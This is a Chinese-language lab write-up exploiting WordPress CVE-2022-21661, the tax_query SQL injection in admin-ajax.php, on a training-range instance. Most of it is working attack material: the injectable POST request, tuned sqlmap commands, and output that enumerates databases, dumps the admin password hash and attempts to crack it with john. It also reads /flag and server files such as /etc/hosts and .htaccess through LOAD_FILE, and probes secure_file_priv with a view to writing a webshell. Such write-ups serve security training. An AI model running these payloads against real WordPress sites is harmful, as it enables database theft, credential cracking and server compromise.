春秋云境CVE-2022-21661,sqlmap+json一把梭哈
网址:
https://yunjing.ichunqiu.com/
https://yunjing.ichunqiu.com/cve/detail/1026?pay=2sqlmap启动参数:
set cmdpath2024=c:\Python310\python
%cmdpath2024% E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="23) " --suffix="#" --threads=4 --current-db --is-dba --dbs --proxy=http://127.0.0.1:8080
# sqlmap {1.6.2.4#dev} , 支持python3.10
#http://127.0.0.1:8080/ 是burpsuite 2022起的http代理,方便观察../rr2024.txt 内容如下:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: eci-2ze8beum9sog31ctu6to.cloudeci1.ichunqiu.com
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Connection: close
action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}#如下命令,查看cms数据库的表
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="23) " --suffix="#" --threads=4 -D cms --tables --proxy=http://127.0.0.1:8080
#如下命令,查看cms数据库的wp_users表的字段有哪些
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="2) " --suffix="#" --threads=6 -D cms -T wp_users --columns --proxy=http://127.0.0.1:8080
#如下命令,导出cms数据库的wp_users表的某字段(user_login,user_nicename,user_pass)
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="2) " --suffix="#" --threads=6 -D cms -T wp_users -C "user_login,user_nicename,user_pass" --dump --proxy=http://127.0.0.1:8080back-end DBMS: MySQL >= 5.0.0
current database: 'cms'
[23:20:12] [INFO] retrieved: 'root@localhost'
current user is DBA: True
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
Database: cms
[12 tables]
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
Database: cms
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(255) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(255) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+---------------------+---------------------+
Database: cms
Table: wp_users
[1 entry]
+-----------------+-----------------+------------------------------------+
| user_login | user_nicename | user_pass |
+-----------------+-----------------+------------------------------------+
| adminadminadmin | adminadminadmin | $P$B9CtTsiRiQYVm4/sD0ylD6qBkN1EO.0 |
+-----------------+-----------------+------------------------------------+
john破解失败:
echo 'adminadminadmin:$P$B9CtTsiRiQYVm4/sD0ylD6qBkN1EO.0'>./hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass ./hashes.txtget flag:
#如下命令,get flag
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="2) " --suffix="#" --threads=6 --file-read="/flag" --proxy=http://127.0.0.1:8080运行结果:
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["12) AND EXTRACTVALUE(2003,CONCAT(0x5c,0x7176766b71,(SELECT (ELT(2003=2003,1))),0x7176767a71))#"]}}}
Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---
[19:52:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[19:52:58] [INFO] fingerprinting the back-end DBMS operating system
[19:53:01] [INFO] the back-end DBMS operating system is Linux
[19:53:01] [DEBUG] going to read the file with a non-stacked query SQL injection technique
[19:53:01] [INFO] fetching file: '/flag'
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2ze420okq7lq6jfkcesm.cloudeci1.ichunqiu.com\files\_flagflag{d77546af-4520-4cf4-a200-94a365ce05be}写webshell的条件探测:
%cmdpath2024% sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="2) " --suffix="#" --threads=6 --sql-query "SELECT concat(now(),0x7e,version(),0x7e,@@secure_file_priv,0x7e,@@plugin_dir)" --proxy=http://127.0.0.1:8080输出:
SELECT concat(now(),0x7e,version(),0x7e,@@secure_file_priv,0x7e,@@plugin_dir): '2024-10-29 12:16:47~5.7.39-0ubuntu0.18.04.2~~/usr/lib/mysql/plugin/'读取/etc/hosts文件(假的站库分离):
# eci-managed hosts file.
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
fe00::0 ip6-mcastprefix
fe00::1 ip6-allnodes
fe00::2 ip6-allrouters
10.9.118.207 engine-2
读取/etc/my.cnf文件不存在
读取/etc/resolv.conf文件:
nameserver 100.100.2.136
nameserver 100.100.2.138/var/www/html/wp-admin/profile.php 283字节
/var/www/html/.htaccess 261字节
/var/www/html/index.php 26字节
/var/www/html/wp-admin/admin-functions.php 406字节
/var/www/html/wp-admin/admin-ajax.php 4.83 KB (4,948 字节)
/var/www/html/wp-admin/admin-ajax.php
[22:28:48] [DEBUG] performed 472 queries in 1455.96 seconds
do you want confirmation that the remote file '/var/www/html/wp-admin/admin-ajax.php' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[22:28:48] [DEBUG] used the default behavior, running in batch mode
[22:28:48] [DEBUG] checking the length of the remote file '/var/www/html/wp-admin/admin-ajax.php'
[22:28:48] [PAYLOAD] 2) AND EXTRACTVALUE(9473,CONCAT(0x5c,0x71766b7a71,(MID((IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f77702d61646d696e2f61646d696e2d616a61782e706870)) AS NCHAR),0x20)),1,21)),0x717a626a71))#
[22:28:50] [INFO] retrieved: '4948'
[22:28:50] [DEBUG] performed 1 query in 2.26 seconds
[22:28:50] [INFO] the local file 'C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_wp-admin_admin-ajax.php' and the remote file '/var/www/html/wp-admin/admin-ajax.php' have the same size (4948 B)
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_wp-admin_admin-ajax.php (same file)探测 /var/www/html/.htaccess
[22:31:50] [DEBUG] performed 25 queries in 71.15 seconds
do you want confirmation that the remote file '/var/www/html/.htaccess' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[22:31:50] [DEBUG] used the default behavior, running in batch mode
[22:31:50] [DEBUG] checking the length of the remote file '/var/www/html/.htaccess'
[22:31:50] [PAYLOAD] 2) AND EXTRACTVALUE(7365,CONCAT(0x5c,0x71766b7a71,(MID((IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f2e6874616363657373)) AS NCHAR),0x20)),1,21)),0x717a626a71))#
[22:31:52] [INFO] retrieved: '261'
[22:31:52] [DEBUG] performed 1 query in 2.24 seconds
[22:31:52] [INFO] the local file 'C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_.htaccess' and the remote file '/var/www/html/.htaccess' have the same size (261 B)
files saved to [1]:
[*] C:\Users\Administrator\AppData\Local\sqlmap\output\eci-2zeg97hlr4sfet7ivvj0.cloudeci1.ichunqiu.com\files\_var_www_html_.htaccess (same file)/var/www/html/.htaccess 的内容
# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
# END WordPress